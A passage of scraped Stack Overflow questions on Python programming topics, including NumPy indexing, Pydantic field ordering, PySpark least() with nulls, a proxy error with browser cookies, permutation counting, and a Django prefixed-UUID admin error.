a = np.ones((6, 8))
indices = [2, 3, 5]
</code></pre>
<pre class="lang-py prettyprint-override"><code># I thought this would work, but it does not.
# It correctly writes to (2,2), (3,3), and (5,5), but not all
# combinations of (2, 3), (2, 5), (3, 2), (3, 5), (5, 2), or (5, 3)
a[indices, indices] = 0.0
print(a)
[[1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 0. 1. 1. 1. 1. 1.]
[1. 1. 1. 0. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 0. 1. 1.]]
</code></pre>
<pre class="lang-py prettyprint-override"><code># I thought this would fix that problem, but it doesn't change the array.
a[indices, :][:, indices] = 0.0
print(a)
[[1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1.]]
</code></pre>
<p>In this toy example, I'm hoping for this result.</p>
<pre class="lang-py prettyprint-override"><code>[[1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 0. 0. 1. 0. 1. 1.]
[1. 1. 0. 0. 1. 0. 1. 1.]
[1. 1. 1. 1. 1. 1. 1. 1.]
[1. 1. 0. 0. 1. 0. 1. 1.]]
</code></pre>
<p>I could probably write a cumbersome loop or build some combinatorically huge list of indices to do this, but it seems intuitive that this must be supported in a cleaner way, I just can't find the syntax to make it happen. Any ideas?</p>
|
<python><arrays><numpy><indices><numpy-slicing>
|
2025-01-16 23:03:35
| 1
| 8,122
|
mightypile
|
79,363,232
| 850,781
|
Cookies needed to connect to the proxy?
|
<p>I get</p>
<pre><code>ProxyError: HTTPSConnectionPool(host='XXX', port=443): Max retries exceeded with url: ZZZZZ (Caused by ProxyError('Unable to connect to proxy', OSError('Tunnel connection failed: 403 Forbidden')))
</code></pre>
<p>on</p>
<pre><code>import requests
requests.get(base_url, proxies=proxies, headers=headers, cookies=cookies_ff)
</code></pre>
<p>where</p>
<pre><code>import browser_cookie3
cookies_ff = browser_cookie3.firefox(domain_name='XXX') # 50 cookies
</code></pre>
<p>but <strong>not</strong> with</p>
<pre><code>requests.get(base_url, proxies=proxies, headers=headers, cookies=cookies_sc)
</code></pre>
<p>where</p>
<pre><code>from http.cookies import SimpleCookie
cookies_sc = SimpleCookie("....") # 37 cookies
</code></pre>
<p>where the string <code>"...."</code> comes from the Chrome debug console <code>document.cookie</code>.
(<code>browser_cookie3.chrome</code> no longer works, see <a href="https://github.com/borisbabic/browser_cookie3/issues/180" rel="nofollow noreferrer">Access to cookie file denied on chrome</a> and <a href="https://github.com/borisbabic/browser_cookie3/issues/210" rel="nofollow noreferrer">Broken decryption in Chrome</a>).</p>
<p>There are a handful of cookies in <code>cookies_sc</code> that are not in <code>cookies_ff</code>, but adding them to <code>cookies_ff</code> does <strong>not</strong> solve the problem.</p>
<p>So, how do I access the URL with the auto-extracted Firefox cookies?</p>
|
<python><cookies><python-requests><http-proxy>
|
2025-01-16 22:40:00
| 0
| 60,468
|
sds
|
79,363,016
| 1,394,353
|
Pydantic multiple inheritance field order - implementation detail or stable feature?
|
<p>I have multiple models which will be very similar. The identifier fields are different. Otherwise, other groups of fields occur in predefined patterns. For example, wrt to the sample below, the <code>present0</code> and <code>present1</code> fields will appear in some models, but not others.</p>
<p>Ultimately the models are used to transform polars dataframes to json data for consumption by <a href="https://tabulator.info" rel="nofollow noreferrer">Tabulator</a> - an HTML/JS table formatting library, so order definitely matters and the models are a good place to carry that info. I've even embedded formatting directives for Tabulator using <code>Annotated</code>.</p>
<p>So what I want to do is to define smaller sub-models with what's specific to each model as well as the definition of recurring field groups. Then assemble them via multiple inheritance.</p>
<p>There's was a <a href="https://github.com/pydantic/pydantic/discussions/5974" rel="nofollow noreferrer">question</a> on their forums that addresses building models via multiple inheritance, and while the person answering was hesitant to endorse that approach, they did say providing that functionality was a stable part of Pydantic behavior.</p>
<p><strong>However, what about the <em>ordering</em> of fields, which seems to happen in reverse <code>mro</code> order?</strong></p>
<h4>Data samples:</h4>
<pre><code> Project shape: (2, 7)
┌─────────┬───────┬──────────┬──────────┬───────────┬─────────────┬─────────────┐
│ project ┆ descr ┆ present0 ┆ present1 ┆ usercount ┆ lastupdater ┆ lastupddttm │
│ --- ┆ --- ┆ --- ┆ --- ┆ --- ┆ --- ┆ --- │
│ str ┆ str ┆ i64 ┆ i64 ┆ i64 ┆ str ┆ str │
╞═════════╪═══════╪══════════╪══════════╪═══════════╪═════════════╪═════════════╡
│ project ┆ d ┆ 0 ┆ 1 ┆ 77 ┆ mcuban ┆ 2009 │
│ project ┆ d ┆ 0 ┆ 1 ┆ 77 ┆ mcuban ┆ 2009 │
└─────────┴───────┴──────────┴──────────┴───────────┴─────────────┴─────────────┘
Customer shape: (2, 7)
┌──────────┬───────┬──────────┬──────────┬───────────┬─────────────┬─────────────┐
│ customer ┆ descr ┆ present0 ┆ present1 ┆ usercount ┆ lastupdater ┆ lastupddttm │
│ --- ┆ --- ┆ --- ┆ --- ┆ --- ┆ --- ┆ --- │
│ str ┆ str ┆ i64 ┆ i64 ┆ i64 ┆ str ┆ str │
╞══════════╪═══════╪══════════╪══════════╪═══════════╪═════════════╪═════════════╡
│ proj ┆ d ┆ 0 ┆ 1 ┆ 77 ┆ jsmith ┆ 1999 │
│ proj ┆ d ┆ 0 ┆ 1 ┆ 77 ┆ jsmith ┆ 1999 │
└──────────┴───────┴──────────┴──────────┴───────────┴─────────────┴─────────────┘
</code></pre>
<h4>Test code - <code>T2project_rev_order_columns</code> gives the correct order</h4>
<pre><code>import sys
from rich import inspect as rin
import pydantic as pyd
import polars as pl
verbose = "-v" in sys.argv
class Project(pyd.BaseModel):
"""my reference field order"""
project : str = "project"
descr : str = "d"
present0 : int = 0
present1 : int = 1
usercount : int = 77
lastupdater : str = "mcuban"
lastupddttm : str = "2009"
class Customer(pyd.BaseModel):
customer : str = "proj"
descr : str = "d"
present0 : int = 0
present1 : int = 1
usercount : int = 77
lastupdater : str = "jsmith"
lastupddttm : str = "1999"
# assemble by components
class KProject(pyd.BaseModel):
project : str = "project"
descr : str = "d"
class Pres(pyd.BaseModel):
present0 : int = 0
present1 : int = 1
class Tag(pyd.BaseModel):
usercount : int = 77
class Upd(pyd.BaseModel):
lastupdater : str = "jsmith"
lastupddttm : str = "1999"
class T1project_order_columns(KProject, Pres, Tag, Upd):
pass
class T2project_rev_order_columns(Upd, Tag, Pres, KProject):
"""ordering works, but is that guaranteed by Pydantic?"""
def test():
def build_df(cls_):
df = pl.from_dicts([cls_().model_dump() for i in range(0,2)])
if verbose:
print("\n\n", cls_.__name__, df)
return df.columns
dataexp = [
Project,
Customer,
T1project_order_columns,
T2project_rev_order_columns,
]
for cls_ in dataexp:
got = build_df(cls_)
if cls_ is Project:
exp = got
classname = f"{cls_.__name__:30.30}"
if not classname.startswith("T"):
continue
if exp == got:
print(f"✅ {classname}\n")
else:
msg2 = f"❌ {classname}"
print(f"{msg2} exp:{','.join(exp)}\n{' ' * (len(msg2)+2)}got:{','.join(got)}\n")
test()
</code></pre>
<h4>output:</h4>
<pre><code>❌ T1project_order_columns exp:project,descr,present0,present1,usercount,lastupdater,lastupddttm
got:lastupdater,lastupddttm,usercount,present0,present1,project,descr
✅ T2project_rev_order_columns
</code></pre>
<h4>Question: is that ordering guaranteed or an implementation detail?</h4>
<hr />
<h4>p.s. for info only - embedding additional metadata directives into a model</h4>
<p>You can't use pydantic models in Annotated, that'll get some weird pydantic error. Non-pydantic data types, like dataclasses work. Annotated is a tuple, you'll have to loop through its constituents and route configuration to the interested components.</p>
<pre><code>@dataclass
class TabulatorSettings:
"use on Tab Models as Annotated dont use a pydantic model in Annotated metadata"
urlField: str = ""
title: str = ""
formatter: str = ""
class CompareGeneral_TabData(pyd.BaseModel):
label: str
value: Annotated[Any, TabulatorSettings(title="Left", formatter="html", width=100)]
value_oth: Annotated[Any, TabulatorSettings(title="Right", formatter="html", width=100)]
</code></pre>
|
<python><pydantic>
|
2025-01-16 20:39:19
| 0
| 12,224
|
JL Peyret
|
79,362,888
| 9,245,853
|
Unexpected output from least (source data includes nulls)
|
<p>Inspired by this <a href="https://stackoverflow.com/a/37675525">answer</a>, I want to find the row-wise minimum between several date columns, and return the column name.</p>
<p>I'm getting unexpected results when a row contains NULLs, which I thought <a href="https://spark.apache.org/docs/latest/api/python/reference/pyspark.sql/api/pyspark.sql.functions.least.html" rel="nofollow noreferrer"><code>least</code></a> excluded, specifically rows 2-5 in this toy example:</p>
<pre><code>import datetime as dt
from pyspark.sql import Row
from pyspark.sql.types import StructField, StructType, DateType
schema = StructType([
StructField("date1", DateType(), True),
StructField("date2", DateType(), True),
StructField("date3", DateType(), True)
])
row1 = Row(dt.date(2024, 1, 1), dt.date(2024, 1, 2), dt.date(2024, 1, 3))
row2 = Row(None, None, dt.date(2024, 1, 3))
row3 = Row(None, dt.date(2024, 1, 1), dt.date(2024, 1, 2))
row4 = Row(None, None, None)
row5 = Row(dt.date(2024, 1, 1), None, None)
df = spark.createDataFrame([row1, row2, row3, row4, row5], schema)
def row_min(*cols):
cols_ = [F.struct(F.col(c).alias("value"), F.lit(c).alias("col")) for c in cols]
return F.least(*cols_)
df.withColumn("output", row_min('date1', 'date2', 'date3').col).show()
</code></pre>
<p>returns</p>
<pre><code>+----------+----------+----------+------+
| date1| date2| date3|output|
+----------+----------+----------+------+
|2024-01-01|2024-01-02|2024-01-03| date1|
| NULL| NULL|2024-01-03| date1|
| NULL|2024-01-01|2024-01-02| date1|
| NULL| NULL| NULL| date1|
|2024-01-01| NULL| NULL| date2|
+----------+----------+----------+------+
</code></pre>
<p>but the desired output is:</p>
<pre><code>+----------+----------+----------+------+
| date1| date2| date3|output|
+----------+----------+----------+------+
|2024-01-01|2024-01-02|2024-01-03| date1|
| NULL| NULL|2024-01-03| date3|
| NULL|2024-01-01|2024-01-02| date2|
| NULL| NULL| NULL| NULL|
|2024-01-01| NULL| NULL| date1|
+----------+----------+----------+------+
</code></pre>
|
<python><apache-spark><pyspark>
|
2025-01-16 19:47:02
| 1
| 50,375
|
BigBen
|
79,362,783
| 4,470,052
|
Snowflake modin.pandas data frame can’t write to snowflake without all columns matching
|
<p>Snowflake’s modin.pandas.dataframe df has 7 columns
Snowflake Table “Db.S.table” has 10 columns - 1 auto increment and most that are nullable</p>
<p>I’m not able to do <code>session.write_pandas(df,database=“Db”,schema=“schema”,table_name=“table”,overwrite=False)</code></p>
<p>Since it’s giving a column mismatch error. Why is this not an issue with native pandas</p>
|
<python><pandas><snowflake-cloud-data-platform><snowflake-schema>
|
2025-01-16 18:59:41
| 1
| 692
|
Flyn Sequeira
|
79,362,776
| 1,457,380
|
Efficiently count lists with certain properties
|
<p>My purpose is to count permutations with certain properties. I first generate the permutations and then remove those that do not satisfy the desired properties. How could I improve the code to be able to enumerate more permutations?</p>
<pre><code>from itertools import permutations
def check(seq, verbose=False):
"""check that the elements of the sequence equal a difference of previous elements"""
n = len(seq)
for k in range(1, n-1):
# build a set of admissible values
dk = {abs(seq[i]-seq[j]) for i in range(0, k) for j in range(i+1, k+1) if i < j}
if k > 0 and verbose:
print('current index = ', k)
print('current subsequence = ', seq[:k+1])
print('current admissible values = ', dk)
print('next element = ', seq[k+1])
# check if the next element is in the set of admissible values
if k > 0 and seq[k+1] not in dk:
# return an invalid subsequence (k+2 to include the invalid element)
return seq[:k+2]
return seq
def is_valid(seq):
"""check that the sequence satisfies certain properties"""
n = len(seq)
if n < 3:
return False
if len(check(seq)) == n:
return True
return False
def filter_perms(perms):
for perm in perms:
if is_valid(perm): yield perm
def make_perms(n):
"""The elements of the list are integers, where a list of length n stores all integers from 1 to n."""
for p in permutations(range(1,n-1)):
yield (n,) + p + (n-1,)
def enumerate_perms(n):
perms = make_perms(n)
return filter_perms(perms)
# testing a good sequence
seq=(5, 2, 3, 1, 4)
check(seq, verbose=True)
is_valid(seq)
# True
# testing a bad sequence
seq=[5, 2, 1, 3, 4]
check(seq, verbose=True)
is_valid(seq)
# False
# testing permutations
tuple(make_perms(5))
# testing enumeration
tuple(enumerate_perms(5))
# ((5, 2, 3, 1, 4), (5, 3, 2, 1, 4))
len(tuple(enumerate_perms(14)))
# 29340
</code></pre>
<p>Summary of discussions in the comments section: Should I use numpy arrays? Should I save the permutations to a database?</p>
|
<python><performance><permutation>
|
2025-01-16 18:56:38
| 1
| 10,646
|
PatrickT
|
79,362,761
| 1,937,197
|
Combined memory usage of a process and all its descendants
|
<p>In Python and on Linux, is there any way to determine the <em>joint</em> memory usage of a process and all its descendants (other processes it may have spawned)?</p>
<p>I'm aware of <code>memory_info().rss</code> in <code>psutil</code>. But I don't think simply adding the <em>rss</em>'es is correct here, since the processes may be sharing libraries and other memory among themselves.</p>
|
<python><linux><psutil>
|
2025-01-16 18:47:31
| 0
| 12,727
|
MWB
|
79,362,710
| 3,294,994
|
How to tell hypothesis.strategies to choose not-None for optional fields
|
<p>I am a consumer of a class that I don't own:</p>
<pre class="lang-py prettyprint-override"><code>from dataclasses import dataclass
@dataclass
class Child:
f1: int
f2: int | None
@dataclass
class Parent:
child: Child
</code></pre>
<p>The actual class is much <em>much</em> deeper and wider.</p>
<p>To run manual tests (not pytest, not CI), I want to create an instance of <code>Parent</code> with random values.</p>
<pre class="lang-py prettyprint-override"><code>from typing import TypeVar
import hypothesis
import hypothesis.strategies
T = TypeVar("T")
def generate(cls: type[T], seed: int) -> T:
objects = []
@hypothesis.seed(seed)
@hypothesis.given(hypothesis.strategies.from_type(cls))
@hypothesis.settings(max_examples=10)
def f(o):
objects.append(o)
f()
# Firts example tends to be a trivial one so return the last one instead
return objects[-1]
print(generate(Parent))
print(generate(Parent))
</code></pre>
<p>output:</p>
<pre class="lang-none prettyprint-override"><code>Parent(child=Child(f1=1234, f2=None))
Parent(child=Child(f1=-10, f2=4567))
</code></pre>
<p>I don't care about the values in the instance, <strong>except</strong> I do <em>not</em> want <code>None</code>s for optional fields (I want <code>Child.f2</code> to be a random int, always). I don't want to maintain code to instantiate one because the class often changes.</p>
<p>How can I update the snippet to tell <code>hypothesis</code> to never choose <code>None</code>?</p>
|
<python><python-hypothesis>
|
2025-01-16 18:26:13
| 2
| 846
|
obk
|
79,362,656
| 11,628,437
|
How to compute weakest preconditions for class methods with object state in Python?
|
<p>I am working on a tool to compute weakest preconditions for certain Python programs, and I’m struggling with handling class objects and their variables. Here's a minimal example of the problem:</p>
<p>For a standalone function like this:</p>
<pre><code>def square_number(n):
return n * n
</code></pre>
<p>Computing the weakest precondition is straightforward. I can define a postcondition (e.g., <code>result == 25</code>) and then backtrack to derive the precondition (e.g., <code>n == 5 or n == -5</code>).</p>
<p>However, I’m unsure how to proceed when dealing with instance variables. For example:</p>
<pre><code>class NumberSquarer:
def __init__(self, k):
self.k = k
def square_number(self):
return self.k * self.k
# Example usage
squarer = NumberSquarer(5)
result = squarer.square_number() # Returns 25
</code></pre>
<p>In this case:</p>
<p>The <code>square_number</code> method depends on the instance variable <code>self.k</code>.
The postcondition could be something like <code>result == 25</code>.
My question is: How do I compute the weakest precondition for the method <code>square_number</code> given a postcondition, especially when the state is encapsulated in the object (e.g., <code>self.k</code>)?</p>
<p>If the method involves multiple instance variables or interactions between methods, how should I approach deriving the precondition systematically? Are there any tools or strategies (e.g., symbolic computation with libraries like SymPy) that can help?</p>
<hr />
<p>Based on the comments and <a href="https://softwarefoundations.cis.upenn.edu/plf-current/index.html" rel="nofollow noreferrer">this</a> book, this is how I derive the weakest preconditions for functions</p>
<p>Let <code>square_number(n)<25</code>,</p>
<p>then <code>n^2<25</code></p>
<p>then the precondition would be <code>n<5 or n>-5</code></p>
<p>I have no idea how to derive preconditions in the cases of classes and class variables. Please let me know if you have more questions.</p>
|
<python><semantics><formal-verification><preconditions><formal-methods>
|
2025-01-16 18:05:21
| 0
| 1,851
|
desert_ranger
|
79,362,616
| 2,058,333
|
FCM notifications not showing on iOS lock screen
|
<p>I googled a bunch but can not find a comprehensive answer.
I am getting my token like this</p>
<pre><code>final notificationSettings = await FirebaseMessaging.instance.requestPermission(
alert: true,
announcement: true,
badge: false,
provisional: false,
sound: true
);
final token = await FirebaseMessaging.instance.getToken();
</code></pre>
<p>and send my notifications with python firebase messaging</p>
<pre><code>notification = messaging.Notification(
'Title',
'Text'
)
message = messaging.Message(
notification=notification,
token=token
)
messaging.send(message)
</code></pre>
<p>The notification arrives, but only in the iPhone notification center. It does not show on the lock screen like all other messages. Do I need to feed in some setting in the app to enable this?
I found that the provisional flag (initially I had it as true) triggers this behavior</p>
<p><a href="https://rnfirebase.io/messaging/ios-permissions#provisional-permission" rel="nofollow noreferrer">https://rnfirebase.io/messaging/ios-permissions#provisional-permission</a></p>
<p>but I have reset it to false and still my notifications do not show on the lock screen...</p>
|
<python><ios><flutter><firebase><firebase-cloud-messaging>
|
2025-01-16 17:51:12
| 2
| 5,698
|
El Dude
|
79,362,564
| 243,031
|
How to extract text associated with image from pdf?
|
<p>I am using <a href="https://pymupdf.readthedocs.io/en/latest/index.html" rel="nofollow noreferrer"><code>pymupdf</code></a> to extract images from PDF. Code sample is as below.</p>
<pre><code>import pymupdf
doc = pymupdf.open('sample.pdf')
page = doc[0] # get the page
image_list = page.get_images()
page_index = 0
for image_index, img in enumerate(image_list):
xref = img[page_index] # get the XREF of the image
pix = pymupdf.Pixmap(doc, xref) # create a Pixmap
if pix.n - pix.alpha > 3: # CMYK: convert to RGB first
pix = pymupdf.Pixmap(pymupdf.csRGB, pix)
pix.save("page_%s-image_%s.png" % (page_index, image_index))
</code></pre>
<p>I am able to extract image <a href="https://i.sstatic.net/TM9qyALJ.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/TM9qyALJ.png" alt="extracted_image" /></a> from sample pdf as</p>
<p><a href="https://i.sstatic.net/tn17zKyf.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/tn17zKyf.png" alt="sample_pdf" /></a></p>
<p>Now I want to extract Text associated with <code>Fig. 6.1</code>, which suppose to return <code>Fig. 6.1 Insect bites. Linear pruritic papules with central crusts demonstrating the “breakfast, lunch, and dinner” sign. Courtesy Antonio Torrelo, MD.</code> only.</p>
<p>I tried <code>page.get_text("block")</code> and <code>page.get_text()</code> but not sure how I can relate <code>Fig. 6.1</code> text only with the extracted image ?</p>
|
<python><pdf><extract><image-text>
|
2025-01-16 17:33:31
| 1
| 21,411
|
NPatel
|
79,362,445
| 1,704,282
|
recursive get a list of the stream down dependencies in python
|
<p>i am trying to get a flatted list of dependencies.</p>
<pre><code>list_of_task_to_generate = [
{"version": "1", "dependency": []},
{"version": "2", "dependency": ["1"]},
{"version": "3", "dependency": ["2"]},
{"version": "4", "dependency": ["3"]},
{"version": "5", "dependency": []},
{"version": "6", "dependency": ["5"]},
]
desire_output = {
"1": ["2", "3", "4"],
"2": ["3", "4"],
"3": ["4"],
"4": [],
"5": ["6"],
"6": [],
}
</code></pre>
<p>This what i have</p>
<pre><code>from pprint import pprint
list_of_task_to_generate = [
{"version": "1", "dependency": []},
{"version": "2", "dependency": ["1"]},
{"version": "3", "dependency": ["2"]},
{"version": "4", "dependency": ["3"]},
{"version": "5", "dependency": []},
{"version": "6", "dependency": ["5"]},
]
def generate_result_recursive(list_of_tasks):
result = {}
def add_dependencies(task):
version = task["version"]
dependencies = task["dependency"]
if version not in result:
result[version] = []
for dep in dependencies:
if dep not in result:
result[dep] = []
result[dep].append(version)
# trying loop
for i in list_of_tasks:
if i["version"] == dep:
add_dependencies(i)
# or this list comprehencion with next
# add_dependencies(next(t for t in list_of_tasks if t["version"] == dep))
for task in list_of_tasks:
add_dependencies(task)
return result
answer = generate_result_recursive(list_of_task_to_generate)
pprint(answer)
</code></pre>
<p>the code generates that is giving the right amount of depenencies</p>
<pre><code>{
'1': ['2', '2', '2'],
'2': ['3', '3'],
'3': ['4'],
'4': [],
'5': ['6'],
'6': []
}
</code></pre>
<p>but I am hitting my head trying to see why is not grabbing the Next dependency, example: the first item should give</p>
<pre><code>'1':['2', '3', '4']
</code></pre>
<p>I appreciate the help guys =)</p>
|
<python><recursion><recursive-datastructures>
|
2025-01-16 16:49:02
| 2
| 1,862
|
pelos
|
79,362,414
| 2,886,575
|
Skipping rows in lazy generator chaining?
|
<p>I have a lazy chain of generators. I would like to chain a generator onto the output of these, but only onto a "range" subset of the output. Specifically, I would like to skip some rows:</p>
<pre><code>def foo():
yield "pickles"
yield from iter(range(4))
def bar(foo_numbers):
yield from (5*num for num in foo_numbers)
# how to construct foo_bar from `foo` and `bar`?
assert foo_bar == ['pickles', 0, 5, 10, 15]
</code></pre>
<p>Notice that the output <code>foo_bar</code> can be obtained from <code>foo</code> followed by <code>bar</code>, except <code>bar</code> should only apply to the first through nth element of the output of <code>foo</code> (skipping the zeroth element). Is there an easy way to have my generators skip <code>n</code> elements?</p>
|
<python><generator>
|
2025-01-16 16:37:32
| 1
| 5,605
|
Him
|
79,362,404
| 3,302,016
|
Pandas Change values of a dataframe based on an override
|
<p>I have a pandas dataframe which looks something like this.</p>
<pre><code>orig | dest | type | class | BKT | BKT_order | value | fc_Cap | sc_Cap
-----+-------+-------+-------+--------+-----------+---------+--------+---------
AMD | TRY | SA | fc | MA | 1 | 12.04 | 20 | 50
AMD | TRY | SA | fc | TY | 2 | 11.5 | 20 | 50
AMD | TRY | SA | fc | NY | 3 | 17.7 | 20 | 50
AMD | TRY | SA | fc | MU | 4 | 09.7 | 20 | 50
AMD | TRY | PE | fc | RE | 1 | 09.7 | 20 | 50
AMD | TRY | PE | sc | EW | 5 | 07.7 | 20 | 50
NCL | MNK | PE | sc | PO | 2 | 08.7 | 20 | 50
NCL | MNK | PE | sc | TU | 3 | 12.5 | 20 | 50
NCL | MNK | PE | sc | MA | 1 | 16.7 | 20 | 50
</code></pre>
<p>Also i have an override Dataframe which may look something like this:</p>
<pre><code>orig | dest | type | max_BKT
-----+-------+-------+-----------
AMD | TRY | SA | TY
NCL | MNK | PE | PO
NCL | AGZ | PE | PO
</code></pre>
<p>what i want to do is modify the original dataframe such that after comparison of <code>orig</code> <code>dest</code> <code>type</code> & <code>BKT</code> ( with <code>max_BKT</code>) values, the <code>value</code> column for any rows which have the <code>BKT_order</code> higher than or equal to the <code>max_BKT</code> in override DF is set to either <code>fc_Cap</code> or <code>sc_Cap</code> depending on the <code>class</code> value.</p>
<p>For Example in above scenario,</p>
<p>Since the Override DF sets <code>max_BKT</code> as <code>TY</code> for <code>AMD | TRY | SA</code> and the bucket order for <code>TY</code> is <code>2</code> in original Df, i need to set the <code>value</code> column equal to <code>fc_Cap</code> or <code>sc_Cap</code>
depending on the value of <code>class</code> for all rows where <code>BKT_order</code> >= <code>2</code></p>
<p>So basically:</p>
<ul>
<li>filter the rows for <code>orig</code> <code>dest</code> <code>type</code> combination</li>
<li>Get the <code>BKT_order</code> of <code>max_BKT</code> from the Original DF</li>
<li>for each row that matches the above criteria
<ul>
<li>if <code>class == fc</code> update value column with fc_Cap</li>
<li>if <code>class == sc</code> update value column with sc_Cap</li>
</ul>
</li>
</ul>
<p>So our original DF looks something like this:</p>
<pre><code>orig | dest | type | class | BKT | BKT_order | value | fc_Cap | sc_Cap
-----+-------+-------+-------+--------+-----------+---------+--------+---------
AMD | TRY | SA | fc | MA | 1 | 12.04 | 20 | 50
AMD | TRY | SA | fc | TY | 2 | 20 | 20 | 50
AMD | TRY | SA | fc | NY | 3 | 20 | 20 | 50
AMD | TRY | SA | fc | MU | 4 | 20 | 20 | 50
AMD | TRY | PE | fc | RE | 1 | 09.7 | 20 | 50
AMD | TRY | PE | sc | EW | 5 | 07.7 | 20 | 50
NCL | MNK | PE | sc | PO | 2 | 50 | 20 | 50
NCL | MNK | PE | sc | TU | 3 | 50 | 20 | 50
NCL | MNK | PE | sc | MA | 1 | 16.7 | 20 | 50
</code></pre>
<p>I have tried an approach to iterate over the override df and try to handle 1 row at a time but, i get stuck when i need to do a reverse lookup to get the <code>BKT_order</code> of the <code>max_BKT</code> from original df.</p>
<p>Hope that makes sense... i am fairly new to pandas.</p>
|
<python><pandas>
|
2025-01-16 16:33:22
| 2
| 4,859
|
Mohan
|
79,362,392
| 3,719,167
|
How to handle prefixed UUIDs in Django Admin for querying and displaying objects?
|
<p>I am working on a Django project with a custom UUIDField with a prefix (e.g., <code>ft_</code>) to represent IDs. The raw UUID is stored in the database, but I want the prefixed value (e.g., ft_) to be shown in API responses, admin interfaces, and elsewhere. However, this creates issues when querying objects in Django Admin because the URLs include the prefixed ID, and Django tries to query the database directly using this prefixed value.</p>
<p>Here is my custom field implementation:</p>
<pre class="lang-py prettyprint-override"><code>import uuid
from django.db import models
class PrefixedUUIDField(models.UUIDField):
def __init__(self, prefix, *args, **kwargs):
self.prefix = prefix
super().__init__(*args, **kwargs)
def from_db_value(self, value, expression, connection):
if value is None:
return value
return f"{self.prefix}_{value}"
def get_prep_value(self, value):
if isinstance(value, str) and value.startswith(f"{self.prefix}_"):
value = value.split(f"{self.prefix}_")[1]
return super().get_prep_value(value)
def to_python(self, value):
if isinstance(value, uuid.UUID):
return f"{self.prefix}_{value.hex}"
if isinstance(value, str) and not value.startswith(f"{self.prefix}_"):
return f"{self.prefix}_{value}"
return value
</code></pre>
<p>The model:</p>
<pre class="lang-py prettyprint-override"><code>class FamilyTree(models.Model):
id = PrefixedUUIDField(prefix="ft", primary_key=True, default=uuid.uuid4, editable=False)
name = models.CharField(max_length=255)
</code></pre>
<p>In Django Admin, the URL for editing an object looks like this:</p>
<pre class="lang-bash prettyprint-override"><code>http://admin.localhost:8000/family_tree/familytree/ft_5F5479ca65374d401d9466d57fc95e4072/change/
</code></pre>
<p>However, this causes the following error:</p>
<pre class="lang-none prettyprint-override"><code>invalid input syntax for type uuid: "ft_5F5479ca65374d401d9466d57fc95e4072"
</code></pre>
<p>I understand this happens because Django Admin tries to query the database using the prefixed id, but the database expects the raw UUID.</p>
<pre><code>originor__dev__app | Internal Server Error: /family_tree/familytree/ft_5F5479ca65374d401d9466d57fc95e4072/change/
originor__dev__app | Traceback (most recent call last):
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/db/backends/utils.py", line 89, in _execute
originor__dev__app | return self.cursor.execute(sql, params)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/psycopg/cursor.py", line 723, in execute
originor__dev__app | raise ex.with_traceback(None)
originor__dev__app | psycopg.errors.InvalidTextRepresentation: invalid input syntax for type uuid: "ft_5479ca65374d401d9466d57fc95e4072"
originor__dev__app | LINE 1: ...familytree" WHERE "family_tree_familytree"."id" = 'ft_5479ca...
originor__dev__app | ^
originor__dev__app |
originor__dev__app | The above exception was the direct cause of the following exception:
originor__dev__app |
originor__dev__app | Traceback (most recent call last):
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/core/handlers/exception.py", line 55, in inner
originor__dev__app | response = get_response(request)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/core/handlers/base.py", line 197, in _get_response
originor__dev__app | response = wrapped_callback(request, *callback_args, **callback_kwargs)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/contrib/admin/options.py", line 688, in wrapper
originor__dev__app | return self.admin_site.admin_view(view)(*args, **kwargs)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/utils/decorators.py", line 134, in _wrapper_view
originor__dev__app | response = view_func(request, *args, **kwargs)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/views/decorators/cache.py", line 62, in _wrapper_view_func
originor__dev__app | response = view_func(request, *args, **kwargs)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/contrib/admin/sites.py", line 242, in inner
originor__dev__app | return view(request, *args, **kwargs)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/contrib/admin/options.py", line 1889, in change_view
originor__dev__app | return self.changeform_view(request, object_id, form_url, extra_context)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/utils/decorators.py", line 46, in _wrapper
originor__dev__app | return bound_method(*args, **kwargs)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/utils/decorators.py", line 134, in _wrapper_view
originor__dev__app | response = view_func(request, *args, **kwargs)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/contrib/admin/options.py", line 1747, in changeform_view
originor__dev__app | return self._changeform_view(request, object_id, form_url, extra_context)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/contrib/admin/options.py", line 1767, in _changeform_view
originor__dev__app | obj = self.get_object(request, unquote(object_id), to_field)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/contrib/admin/options.py", line 866, in get_object
originor__dev__app | return queryset.get(**{field.name: object_id})
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/db/models/query.py", line 633, in get
originor__dev__app | num = len(clone)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/db/models/query.py", line 380, in __len__
originor__dev__app | self._fetch_all()
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/db/models/query.py", line 1881, in _fetch_all
originor__dev__app | self._result_cache = list(self._iterable_class(self))
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/db/models/query.py", line 91, in __iter__
originor__dev__app | results = compiler.execute_sql(
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/db/models/sql/compiler.py", line 1562, in execute_sql
originor__dev__app | cursor.execute(sql, params)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/db/backends/utils.py", line 102, in execute
originor__dev__app | return super().execute(sql, params)
